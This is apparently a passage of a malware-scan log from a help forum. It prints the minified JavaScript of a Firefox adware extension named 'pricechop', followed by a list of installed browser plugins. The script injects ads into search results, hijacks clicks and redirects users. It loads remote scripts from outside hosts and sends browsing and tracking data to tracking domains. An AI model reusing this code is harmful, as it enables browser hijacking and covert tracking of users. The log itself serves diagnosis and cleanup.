window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=15713307296802838624&eid=42&pid=2729&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CZ&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://w ... m=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\" ... earch.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/searc ... arch.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json(c));a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse(c);return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if(c)for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch(c){}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler(c),__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=15713307296802838624&eid=42&pid=2729&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler(c),__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=42_2729&hid=15713307296802838624&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=42_2729&hid=15713307296802838624&bname=pricechop\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self.location.hostname.indexOf('mail.')==-1)\n{try{for(i=0;i<5;i++){window.setTimeout(function(){if(document.getElementById(\"cblocker\")){document.getElementById(\"cblocker\").parentNode.removeChild(document.getElementById(\"cblocker\"));};if(document.getElementById(\"_vdcbl\")){document.getElementById(\"_vdcbl\").parentNode.removeChild(document.getElementById(\"_vdcbl\"));}},i*100)}}catch(e){};\n};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ecgc6VPn=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ecgc6VPn=\")){var d=a.match(/ecgc6VPn=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BN ... YHpdgGqa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=rTw6vTw4qS5G ... }}catch(d){}})();(function(){var g=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},h=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\")||0:0},k=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children[b].getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},l=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");if(a&&a[1]&&a[1].innerHTML)return(a=a[1].innerHTML.replace(/[^0-9]/g,\"\"))||0;if(a&&a[0]&&a[0].innerHTML||(a=document.getElementsByClassName(\"_mov\"))&&a[0]&&a[0].innerHTML)return(a=a[0].innerHTML.replace(/[^0-9]/g,\"\"))||0};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var e=document.getElementsByTagName(\"body\")[0];if(!e.getAttribute(\"wyttb\")){e.setAttribute(\"wyttb\",\"1\");var f=g(),d=h(),m=k(),n=l();f&&d&&d&&((new Image).src=\"https://score.transferin.in/v.php?id=\" ... 96.213.165\")}}catch(p){}})();;if(-1==window.self.location.hostname.indexOf('mail.')){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer && c2soffer.length && c2soffer.length>0)for(var i=0;i<c2soffer.length;i++)c2soffer[i].parentNode.removeChild(c2soffer[i]);document.getElementById('w3uyh7g6h7f5x')&&document.getElementById('w3uyh7g6h7f5x').parentNode.removeChild(document.getElementById('w3uyh7g6h7f5x'))};if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&5>parseInt(\"1.45\")&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://r.searchfun.in/?g=Azm9CdOLv6D6DG ... DeDPBMY%3D\");var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch(c){}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: %7B0d45f140-f048-43a8-8755-71bde9e9f4e6%7D:2.0.3.0
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:33.1
FF - prefs.js..keyword.URL: ""
FF - user.js - File not found

FF:[b]64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll File not found
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Lobo\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

64bit-FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\PROGRAM FILES\ESET\ESET SMART SECURITY\MOZILLA THUNDERBIRD [2013.04.23 15:43:57 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
